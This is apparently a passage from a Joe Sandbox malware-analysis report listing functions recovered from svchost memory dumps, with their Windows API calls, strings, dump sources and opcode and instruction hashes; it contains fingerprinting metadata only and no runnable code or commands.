Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 96F0DAA1711F88A2FF58CB60F88CB6D2360FB98B98F443029A50B45565DE28C8CCC780

Function 000002C9AFBBA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002C9AFBBA154
GetProcAddress.KERNEL32 ref: 000002C9AFBBA16A
FreeLibrary.KERNEL32 ref: 000002C9AFBBA187

Strings

mscoree.dll, xrefs: 000002C9AFBBA14B
CorExitProcess, xrefs: 000002C9AFBBA163

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: be63d93167989de38ed4729333681a73d350b129477774fad9e545089f018a49
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 6FF0126371174491FF945B60E89CB6F2374EB8CB90F482029991F455A4DF3AC5CAC710

Function 000002C9B02951B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002C9B0295236

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: b90d4c69e50f11a534a51cc10133cdb39f6fc15811da4279f7f99f6003cd9a59
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: B102B772219BC496E760CB55F49C75EB7A0F384788F505125EA8E87BA9DF7CC888CB40

Function 000002C9AFBB51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002C9AFBB5236

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 1639f54d1a2db31597ab061571d91a728a79d2649a59436871a533dcce9696dc
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 8802A537219B8486E7A0CB59E49C75EB7B0F3C8794F104125EA8E87BA8DB7DC495CB01

Function 000002C9B02A0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002C9B02A08A2
GetConsoleMode.KERNEL32 ref: 000002C9B02A0960
GetLastError.KERNEL32 ref: 000002C9B02A09EA

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: ce0290b6db2e6ee72a3fa482e25c63a1a0fc021221276da1183f7416593dbbc0
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 9581E5A2610F98A9FB54DF61A98CBAD67A0F748B9CF442115DE0A53792DF34CCC9C390

Function 000002C9AFBC0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002C9AFBC08A2
GetConsoleMode.KERNEL32 ref: 000002C9AFBC0960
GetLastError.KERNEL32 ref: 000002C9AFBC09EA

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 369862b865f485540b14611f5bae7f60014c65c826d1c2498f7e1c78993b8d8e
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 87818D23710A5489FB50AB65D88CBAF66B1F75CBD8F444216EE0EA7692DB3684C3C710

Function 000002C9B02957F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002C9B0295806

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 31977e04e21dfdcf7141a31ff40d1d7e711db1dd2b56a2050cc226599f3ff4d2
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 6261CDB6619E94D6F760CB15F44C71E77A0F388748F506125EA8E43BA4CB7CC984CB80

Function 000002C9AFBB57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002C9AFBB5806

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 3900f3059c738225f6a5fa85eb6fb975c0c954b7180fbb75279ffa4281695522
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 30619537619A40C6F660DB15E49CB1EB7B0F388B94F500125FA8D47BA8DB7AC5918F01

Function 000002C9AFB912B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002C9AFB912E0
_set_statfp.LIBCMT ref: 000002C9AFB912FB
_set_statfp.LIBCMT ref: 000002C9AFB91317
_set_statfp.LIBCMT ref: 000002C9AFB91353

Memory Dump Source

Source File: 0000001B.00000002.2678865250.000002C9AFB80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFB80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afb80000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: d818f852ad0d94a2d1d75cbb439bd8fdbfa48d6e876fce20739df24100a7b2b2
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: B811A923A5CE0112FA642275E5DEB7D30716B55374F484629AA7F16BF68B2A8CC26100

Function 000002C9B02A1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002C9B02A1EE0
_set_statfp.LIBCMT ref: 000002C9B02A1EFB
_set_statfp.LIBCMT ref: 000002C9B02A1F17
_set_statfp.LIBCMT ref: 000002C9B02A1F53

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: f196f5ed6ba1ea877bfe2618c6159774e885ff479544362140b7b07de737a2f8
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 2D11C6B2A54FCC29FAA89168F55EB6D50407B6437CF082674BE7686BF68F188CCD4180

Function 000002C9AFBC1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002C9AFBC1EE0
_set_statfp.LIBCMT ref: 000002C9AFBC1EFB
_set_statfp.LIBCMT ref: 000002C9AFBC1F17
_set_statfp.LIBCMT ref: 000002C9AFBC1F53

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 38f7e1978cb016fdada063fc0ed106d72821edb380f9c7efd89232f2566a42ed
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 8311CC23A54A1142F7985164E49EB6F10717F6E374F444634FA7F367F68B568CC39110

Function 000002C9B0299658 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002C9B0299677
SetLastError.KERNEL32 ref: 000002C9B02996FE

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction ID: 06c188d41736c0ee36ca8f11025a9626d3cda27a5ee3e0f90fd7c785db233fb1
Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction Fuzzy Hash: BC1142E0211EC462FE54D729B84DF1D2395B7487B8F146634D926077D5DE2CDCCAC680

Function 000002C9B0293878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002C9B0293886
GetCurrentProcess.KERNEL32 ref: 000002C9B02938B4
VirtualProtectEx.KERNEL32 ref: 000002C9B02938D6
GetCurrentProcess.KERNEL32 ref: 000002C9B02938F4
VirtualProtectEx.KERNEL32 ref: 000002C9B0293915

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: ebae5d6b033c2d3c81e8c42231290614dbd24878567faaa549f479a2a74637d1
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: AB112A6A704F8492FB14DB11F40CB6EA6A0F789B88F041039EE8907794EE3DC988C740

Function 000002C9AFBB3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002C9AFBB3886
GetCurrentProcess.KERNEL32 ref: 000002C9AFBB38B4
VirtualProtectEx.KERNEL32 ref: 000002C9AFBB38D6
GetCurrentProcess.KERNEL32 ref: 000002C9AFBB38F4
VirtualProtectEx.KERNEL32 ref: 000002C9AFBB3915

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 7c1077f289e9fe3bdad664426f5ef8321a411fd66ba1491de2762dda9ca6b00b
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 7211F72B705B4186FB549B21F84CBAE66B4FB88B84F494039DE8D07794EE3EC589C704

Function 000002C9AFB884F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002C9AFB88503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002C9AFB88598

Strings

f, xrefs: 000002C9AFB88516
csm, xrefs: 000002C9AFB8857E

Memory Dump Source

Source File: 0000001B.00000002.2678865250.000002C9AFB80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFB80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afb80000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 58bbeb18a011c253736ef621836d1cf4ee9f6a422d9b84fdefbc0d91292fa91d
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 8A5184336126008BFB28DF25E88CF6D37B5F384B98F518124DA1E47788EB36D9818784

Function 000002C9B02A0604 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002C9B02A071B
GetLastError.KERNEL32 ref: 000002C9B02A073D

Strings

U, xrefs: 000002C9B02A06C7
ec, xrefs: 000002C9B02A0623

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U$ec
API String ID: 442123175-660619397
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 5405106f66eea1edc96533808c50d55114c38088c5d7d8d608e4c02f9a47cae2
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: FD41A4B2614E8491EB20DF25F84C79DA7A4F398B98F405125EE4D87754DF3CC995CB80

Function 000002C9AFB884D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002C9AFB88503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002C9AFB88598

Strings

f, xrefs: 000002C9AFB88516
csm, xrefs: 000002C9AFB8857E

Memory Dump Source

Source File: 0000001B.00000002.2678865250.000002C9AFB80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFB80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afb80000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: ddbd828c01473e696428a1b25e579e1d2d5dc67caa4f7240124a9e3257c085b0
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 573147772116409BF714DF22E88CBAD37B4F780B98F158124AE5E07789DB3AC981C788

Function 000002C9AFBB14B4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002C9AFBB14D5
HeapFree.KERNEL32 ref: 000002C9AFBB14E4
GetProcessHeap.KERNEL32 ref: 000002C9AFBB14F0
HeapFree.KERNEL32 ref: 000002C9AFBB14FF
GetProcessHeap.KERNEL32 ref: 000002C9AFBB152A

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction ID: 4157b3932650a9c2520fbb33bb3fefd9e3877b61ed9d531ab6480a83bb933ac3
Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction Fuzzy Hash: F9111832514B889AFB549F66A84C65F7370F789F84F484029EB8E03764DF39C4928740

Function 000002C9B029CCB4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 000002C9B029C6CC: GetOEMCP.KERNEL32 ref: 000002C9B029C6F6

IsValidCodePage.KERNEL32 ref: 000002C9B029CD1F
GetCPInfo.KERNEL32 ref: 000002C9B029CD6B

Strings

ec, xrefs: 000002C9B029CCC8

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: ec
API String ID: 546120528-2323562846
Opcode ID: 35d6533b1720f8da579d8e82cf18d97fc9af59e992c0e4d0a17b5eb86b4e7be8
Instruction ID: fbeb27188459d1e4cacef938b7f874e68e522ed59dde181cc182eafb05bbc104
Opcode Fuzzy Hash: 35d6533b1720f8da579d8e82cf18d97fc9af59e992c0e4d0a17b5eb86b4e7be8
Instruction Fuzzy Hash: 5F81E5E2604AC4A6FB65CF25B44CB6D7A91F3447C8F686136CA8A47790DA38DDC9C380

Function 000002C9B02926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002C9B02927D4
StrCpyW.SHLWAPI ref: 000002C9B02927ED

Strings

\\.\pipe\, xrefs: 000002C9B02927DF

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: bfec094555f264a0b7d98c547016e308e13e7614c4bbc8d9648797e08b8f993a
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 1971BFB2200FC165FB24DB25A94CBAE7691F785B88F542036DD4943B98DE34CD8CC780

Function 000002C9AFBB26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002C9AFBB27D4
StrCpyW.SHLWAPI ref: 000002C9AFBB27ED

Strings

\\.\pipe\, xrefs: 000002C9AFBB27DF

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 5270c7a57c485555bd0944d5c6b2527c50cb0f8da07f7e32649a429db8fe0dda
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: A371C13320078286FB299F25D95CBAEA7B0F788BC4F440036DE8D47B98DE36C6858700

Function 000002C9B02924DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002C9B02925C3
StrCpyW.SHLWAPI ref: 000002C9B02925DA

Strings

\\.\pipe\, xrefs: 000002C9B02925CE

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: d39ef9e53f79a69478c55c11a25f549c8514abcac92dcfa917acfc3a9d625a08
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: B251C372608BC162F624DE29B15CB6E7695F385788F452035DE8A03F99CA35CC8DCBC0

Function 000002C9AFBB24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002C9AFBB25C3
StrCpyW.SHLWAPI ref: 000002C9AFBB25DA

Strings

\\.\pipe\, xrefs: 000002C9AFBB25CE

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: d5b993508868c0797fef197f1fdc53345f539015327a1f6e55c5fb7d7e6507cf
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 3551C83320878182F676AF29A95CBAE6671F785780F554035DE8F43B99DE3BC885CB40

Function 000002C9B029C7DC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 000002C9B029C81E

Strings

ec, xrefs: 000002C9B029C7F6
, xrefs: 000002C9B029C861

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Info
String ID: $ec
API String ID: 1807457897-2734216012
Opcode ID: e4a143ca4120123da4d2f14e02aee1ec5d2bf5d6a13d88a6f2b8b94793a2fa23
Instruction ID: 4878dfde828e92764df612a55c5cd6d0134cde3af5375dc9368588f3de8f3e2b
Opcode Fuzzy Hash: e4a143ca4120123da4d2f14e02aee1ec5d2bf5d6a13d88a6f2b8b94793a2fa23
Instruction Fuzzy Hash: 8051B8B2518AD096F765CF24E04C7ED7BA0F349B8CF645125EA8947789CB78C989CBC0

Function 000002C9AFBC0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002C9AFBC071B
GetLastError.KERNEL32 ref: 000002C9AFBC073D

Strings

U, xrefs: 000002C9AFBC06C7

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: d824cbc75c2384e035841bff3ed5c36e7d2a55b3cc11a2bea2ea6dd09101fe9e
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 51417F63314A8082EB609F25E85C7AEB7B0F79C7D4F854125EE8D87798DB39C582CB40

Function 000002C9B02A04E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002C9B02A05B2
GetLastError.KERNEL32 ref: 000002C9B02A05CE

Strings

ec, xrefs: 000002C9B02A0503

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: ec
API String ID: 442123175-2323562846
Opcode ID: 41a51caffb26de89bbe0c185f881ee4edcf50a5614ce5641243d2a174bd7e7c3
Instruction ID: bf1a90250f3c464b17e580480435fdfa989de8183093762ee77b067974181db6
Opcode Fuzzy Hash: 41a51caffb26de89bbe0c185f881ee4edcf50a5614ce5641243d2a174bd7e7c3
Instruction Fuzzy Hash: 503181B2710A84A6EB10DF19F48C79DA3A0F758788F845426EA4D87754DF38C99ACB40

Function 000002C9B02A03E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002C9B02A0497
GetLastError.KERNEL32 ref: 000002C9B02A04B3

Strings

ec, xrefs: 000002C9B02A03FF

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: ec
API String ID: 442123175-2323562846
Opcode ID: 52c4664a05fe08042f934c792fbe9bb495d98380603adefd8139ce93c4d597c0
Instruction ID: 1fadef942b3970ca4b24e4d6a2d80451d6648de1e2e2293045638923efdec293
Opcode Fuzzy Hash: 52c4664a05fe08042f934c792fbe9bb495d98380603adefd8139ce93c4d597c0
Instruction Fuzzy Hash: 603191B2214B88A6E710DF15F48C78DB760F358784F445021EB4A83754DF38C99AC740

Function 000002C9B029C3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000002C9B029C42C
GetLastError.KERNEL32 ref: 000002C9B029C436

Strings

ec, xrefs: 000002C9B029C40A

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: ec
API String ID: 2776309574-2323562846
Opcode ID: 31f6bd162c74a95353f8a4d922ed4d515b5d77d8aca2042f3fab3af1802124d8
Instruction ID: d168d993fd49575a538b3485fab1f9e80899dd9c557f6eb984fe36cb40928fe8
Opcode Fuzzy Hash: 31f6bd162c74a95353f8a4d922ed4d515b5d77d8aca2042f3fab3af1802124d8
Instruction Fuzzy Hash: CB31A572214FC4A6F760CB15F45C76EB7A4F784798F246125AA8D43B99DB38C988CB80

Function 000002C9B029D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002C9B029D6F9
LCMapStringW.KERNEL32 ref: 000002C9B029D781

Strings

